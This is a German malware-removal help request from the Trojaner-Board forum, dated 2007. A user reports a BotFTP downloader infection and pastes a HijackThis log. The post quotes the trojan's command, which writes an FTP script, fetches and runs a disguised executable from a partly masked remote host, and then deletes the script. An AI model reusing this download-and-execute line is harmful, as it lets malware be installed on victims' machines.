Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   W32/BotFTP.A!tr.dldr :( (https://www.trojaner-board.de/46418-w32-botftp-a-tr-dldr.html)

FatRandy 28.11.2007 18:14
W32/BotFTP.A!tr.dldr :(
 
Hallo zusammen,
ich habe jetzt schon ne ganze Zeit gesucht, aber noch nichts gefunden.

Folgende Meldung erhalte ich durch Fortinet:
W32/BotFTP.A!tr.dldr
Auf der Herstellerseite gibt es keine Info zu Säuberung, bei Google und hier finde ich leider auch nichts passendes :(

Der Trojaner öffnet nach Lust und Laune Start - ausführen und haut folgendes wie wild rein:
cmd /c echo OPEN 91.xxx.xxx.xxx 6465>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

HJT Logfile:
Logfile of HijackThis v1.99.1
Scan saved at 18:02:00, on 28.11.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16544)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\ibmpmsvc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Fortinet\FortiClient\scheduler.exe
C:\Programme\Fortinet\FortiClient\FCDBLog.exe
C:\Programme\Fortinet\FortiClient\fmon.exe
C:\Programme\Fortinet\FortiClient\fortifw.exe
C:\Programme\Fortinet\FortiClient\FortiProxy.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\ThinkPad\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\IPSSVC.EXE
C:\Programme\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
C:\Programme\Intel\Wireless\Bin\EvtEng.exe
C:\Programme\lotus\notes\nslsvice.exe
C:\Programme\lotus\notes\ntmulti.exe
C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
C:\Programme\Lenovo\System Update\SUService.exe
C:\Programme\Gemeinsame Dateien\Lenovo\tvt_reg_monitor_svc.exe
C:\WINDOWS\System32\TPHDEXLG.exe
C:\WINDOWS\system32\TpKmpSVC.exe
C:\Programme\Lenovo\Rescue and Recovery\rrpservice.exe
C:\Programme\Lenovo\Rescue and Recovery\rrservice.exe
C:\Programme\Gemeinsame Dateien\Lenovo\Scheduler\tvtsched.exe
C:\Programme\Lenovo\Rescue and Recovery\ADM\IUService.exe
C:\Programme\Gemeinsame Dateien\Lenovo\Logger\logmon.exe
C:\Programme\RealVNC\VNC4\WinVNC4.exe
C:\Programme\ThinkPad\ConnectUtilities\AcSvc.exe
C:\Programme\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Fortinet\FortiClient\FortiTray.exe
C:\Programme\Synaptics\SynTP\SynTPLpr.exe
C:\Programme\Synaptics\SynTP\SynTPEnh.exe
C:\Programme\Gemeinsame Dateien\Lenovo\Scheduler\scheduler_proxy.exe
C:\WINDOWS\system32\TpShocks.exe
C:\Programme\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
C:\PROGRA~1\THINKV~1\PrdCtr\LPMGR.exe
C:\Programme\Lenovo\AwayTask\AwaySch.EXE
C:\Programme\Lenovo\HOTKEY\TPOSDSVC.exe
C:\Programme\ThinkPad\ConnectUtilities\ACTray.exe
C:\Programme\Lenovo\HOTKEY\TPONSCR.exe
C:\Programme\ThinkPad\ConnectUtilities\ACWLIcon.exe
C:\Programme\Lenovo\Zoom\TpScrex.exe
C:\Programme\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\rundll32.exe
C:\Programme\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
C:\Programme\Lenovo\Client Security Solution\cssauth.exe
C:\Programme\FreePDF_XP\fpassist.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\OpenOffice.org 2.3\program\soffice.exe
C:\Programme\OpenOffice.org 2.3\program\soffice.BIN
C:\Programme\Lenovo\Client Security Solution\tvtpwm_tray.exe
C:\Programme\Fortinet\FortiClient\FortiClient.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WLLoginProxy.exe
C:\Programme\WinRAR\WinRAR.exe
C:\temp\Rar$EX00.218\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = w*w.web.de
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = ht*p://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = ht*p://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = ht*p://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = ht*p://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: ThinkVantage Password Manager - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Programme\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O4 - HKLM\..\Run: [SynTPLpr] C:\Programme\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Programme\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [TVT Scheduler Proxy] C:\Programme\Gemeinsame Dateien\Lenovo\Scheduler\scheduler_proxy.exe
O4 - HKLM\..\Run: [TpShocks] TpShocks.exe
O4 - HKLM\..\Run: [StartCCC] C:\Programme\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
O4 - HKLM\..\Run: [LPManager] C:\PROGRA~1\THINKV~1\PrdCtr\LPMGR.exe
O4 - HKLM\..\Run: [TP4EX] tp4ex.exe
O4 - HKLM\..\Run: [AwaySch] C:\Programme\Lenovo\AwayTask\AwaySch.EXE
O4 - HKLM\..\Run: [TPHOTKEY] C:\Programme\Lenovo\HOTKEY\TPOSDSVC.exe
O4 - HKLM\..\Run: [ACTray] C:\Programme\ThinkPad\ConnectUtilities\ACTray.exe
O4 - HKLM\..\Run: [ACWLIcon] C:\Programme\ThinkPad\ConnectUtilities\ACWLIcon.exe
O4 - HKLM\..\Run: [TPKMAPHELPER] C:\Programme\ThinkPad\Utilities\TpKmapAp.exe -helper
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Programme\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [SoundMAX] C:\Programme\Analog Devices\SoundMAX\Smax4.exe /tray
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [Client Access Service] "C:\Programme\IBM\Client Access\cwbsvstr.exe"
O4 - HKLM\..\Run: [cssauth] "C:\Programme\Lenovo\Client Security Solution\cssauth.exe" silent
O4 - HKLM\..\Run: [FreePDF Assistant] C:\Programme\FreePDF_XP\fpassist.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [PSQLLauncher] "C:\Programme\ThinkVantage Fingerprint Software\launcher.exe" /startup
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: OpenOffice.org 2.3.lnk = C:\Programme\OpenOffice.org 2.3\program\quickstart.exe
O8 - Extra context menu item: Senden an &Bluetooth-Gerät... - C:\Programme\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Programme\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra 'Tools' menuitem: ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Programme\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\ThinkPad\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\ThinkPad\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {2DAD3559-2923-4935-AD49-B673D2539944} (IASRunner Class) - ht*p://w*w-307.ibm.com/pc/support/acpir.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - ht*p://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1196178698739
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WINDOW~4\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WINDOW~4\MESSEN~1\MSGRAP~1.DLL
O20 - Winlogon Notify: ACNotify - ACNotify.dll (file missing)
O20 - Winlogon Notify: psfus - C:\WINDOWS\system32\psqlpwd.dll
O20 - Winlogon Notify: tpfnf2 - C:\Programme\Lenovo\HOTKEY\notifyf2.dll
O20 - Winlogon Notify: tphotkey - C:\Programme\Lenovo\HOTKEY\tphklock.dll
O23 - Service: Ac Profile Manager Service (AcPrfMgrSvc) - Lenovo - C:\Programme\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
O23 - Service: Access Connections Main Service (AcSvc) - Lenovo - C:\Programme\ThinkPad\ConnectUtilities\AcSvc.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programme\ThinkPad\Bluetooth Software\bin\btwdins.exe
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: Fortinet Service Scheduler (FA_Scheduler) - Fortinet Inc. - C:\Programme\Fortinet\FortiClient\scheduler.exe
O23 - Service: ThinkPad PM Service (IBMPMSVC) - Lenovo - C:\WINDOWS\system32\ibmpmsvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: IPS-Basisservice (IPSSVC) - Lenovo Group Limited - C:\WINDOWS\system32\IPSSVC.EXE
O23 - Service: Lotus Notes - Gemeinsame Anmeldung (Lotus Notes Single Logon) - IBM Corp - C:\Programme\lotus\notes\nslsvice.exe
O23 - Service: Multi-user Cleanup Service - IBM Corp - C:\Programme\lotus\notes\ntmulti.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: System Update (SUService) - Lenovo Group Limited - C:\Programme\Lenovo\System Update\SUService.exe
O23 - Service: ThinkVantage Registry Monitor Service - Lenovo Group Limited - C:\Programme\Gemeinsame Dateien\Lenovo\tvt_reg_monitor_svc.exe
O23 - Service: ThinkPad HDD APS Logging Service (TPHDEXLGSVC) - Lenovo. - C:\WINDOWS\System32\TPHDEXLG.exe
O23 - Service: IBM KCU Service (TpKmpSVC) - Unknown owner - C:\WINDOWS\system32\TpKmpSVC.exe
O23 - Service: TSS Core Service (TSSCoreService) - IBM - C:\Programme\Lenovo\Client Security Solution\tvttcsd.exe
O23 - Service: TVT Backup Protection Service - Unknown owner - C:\Programme\Lenovo\Rescue and Recovery\rrpservice.exe
O23 - Service: TVT Backup Service - Lenovo Group Limited - C:\Programme\Lenovo\Rescue and Recovery\rrservice.exe
O23 - Service: TVT Scheduler - Lenovo Group Limited - C:\Programme\Gemeinsame Dateien\Lenovo\Scheduler\tvtsched.exe
O23 - Service: tvtnetwk - Unknown owner - C:\Programme\Lenovo\Rescue and Recovery\ADM\IUService.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programme\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

Weiss nicht mehr weiter und Format C: möchte ich unbedingt umgehen...
Kann mir wer weiterhelfen?


Alle Zeitangaben in WEZ +1. Es ist jetzt 10:31 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131